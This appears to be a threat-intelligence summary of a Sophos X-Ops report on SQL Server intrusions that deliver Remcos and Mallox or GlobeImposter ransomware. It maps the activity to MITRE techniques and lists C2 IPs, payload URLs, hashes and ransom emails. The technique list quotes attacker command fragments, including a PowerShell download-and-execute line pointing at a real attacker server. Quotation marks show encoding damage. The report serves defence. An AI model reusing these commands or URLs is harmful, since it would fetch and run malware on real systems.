Sophos X-Ops describes a coordinated Observe-Orient-Decide-Act loop among SophosLabs, SecOps, MTR, and Sophos AI to study and disrupt a wave of Microsoft SQL Server attacks leveraging old RCE CVEs and delivering Remcos or various ransomware families including TargetCompany/Mallox and GlobeImposter/Alpha865qqz. The report emphasizes cross-team collaboration, rapid containment, and ongoing protection improvements to prevent repeat incidents in Asia and the Americas. #Mallox #TargetCompany #GlobeImposter #Alpha865qqz #Remcos #KMSAuto #SQLServer #CVE-2019-1068 #CVE-2020-0618 #SophosXOps
Keypoints
- The investigation notes an uptick in attacks against Microsoft SQL Server leveraging CVE-2019-1068 and CVE-2020-0618, with victims located primarily in Asia.
- Attacks deploy Remcos and multiple ransomware families, including TargetCompany/Mallox and GlobeImposter/Alpha865qqz, using externally exposed/unpatched SQL servers.
- Sophos MTR and Rapid Response coordinated to identify the threatβs infrastructure, IoCs, and attack steps, with ongoing input from Sophos Labs and Sophos AI.
- Initial access was observed via SQL Server, with download-and-execute chains starting from PowerShell and .NET components reaching final payloads.
- Infection chains employ PowerShell downloaders, dotNet downloaders, and obfuscated/encrypted payloads, ultimately delivering ransomware or Remcos.
- Kill$ cleaner, 7zip SFX installers, AutoIt-based loaders, and other components show a diverse toolset used during the compromise, including attempts to disable defenses (IOBit Unlocker).
- Rapid Response helped prevent lateral movement and encryption on the customer, highlighting the value of cross-team collaboration and a strong security stack (including Intercept X).
MITRE Techniques
- [T1190] Exploit Public-Facing Application β Initial access via exploiting publicly accessible SQL Server vulnerabilities; βexternally exposed and unpatched SQL servers.β
- [T1059.003] Windows Command Shell β Use of cmd.exe to execute commands that download and run payloads; βC:Windowssystem32cmd.exeβ /c βecho $client = New-Object β¦β
- [T1059.001] PowerShell β Use of PowerShell to download and execute update.ps1 and subsequent components; β$client.DownloadFile(βhttp://91[.]243[.]44[.]142/arx-Ikrbwika.exeβ,βC:UsersMSSQL$~1AppDataLocalTempVKDA55H6.exeβ)β
- [T1047] Windows Management Instrumentation β Execution via WMIC to create processes for payloads; βWMIC process call create β¦β
- [T1027] Obfuscated/Encrypted Files and Information β Final payload is obfuscated/encrypted and decoded by the downloader; βThe final payload is in obfuscated or encrypted form, so the dotNet downloader has to decode it first.β
- [T1486] Data Encrypted for Impact β Ransomware encryption observed and mitigated by CryptoGuard; βSophos CryptoGuard detected a ransomware attack and prevented encryption of essential files.β
- [T1562.001] Impair Defenses β Attempts to disable protections via IOBit Unlocker; βto disable antivirus and antimalware protections such as Intercept X.β
Indicators of Compromise
- [IP] β C2/download servers and activity hosts β 91.243.44.42, 91.243.44.142, and 91.243.44.105
- [File Hash] β Example payloads observed in campaigns β 7d0687911ea9423310b7b83ebec9f52944ac022795c3b796aca5f0d2d15954b1, 8bb03cb1d5faf00b93612a10f24fb3afe025f59c0226a4b20b1a61fe06cd2077, 5d0e4ef9ee1f3a319faa45c572b5e7097865ddbda3840d138ae65a7d829cfddf
- [File Name] β Downloads and executables tied to the campaign β 9YFHR4SL.exe, C258SEE8.exe
- [URL] β Download and payload delivery URLs β http://91.243.44.105/Lvmsrqz_Phdvabki.jpg, http://91.243.44.142/arx-Ikrbwika.exe
- [Email] β Ransom note and contact addresses β [email protected], [email protected], [email protected]
Read more: https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/